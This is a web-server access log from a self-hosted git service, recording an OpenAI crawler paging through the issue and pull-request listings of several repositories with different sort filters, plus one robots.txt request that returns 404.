"/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:06:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:19:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=source" [Client 74.7.227.38] [Length 16675] [Gzip 4.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:19:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=rendered" [Client 74.7.227.38] [Length 14079] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:19:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:06:16 +0000] - 200 200 - GET https 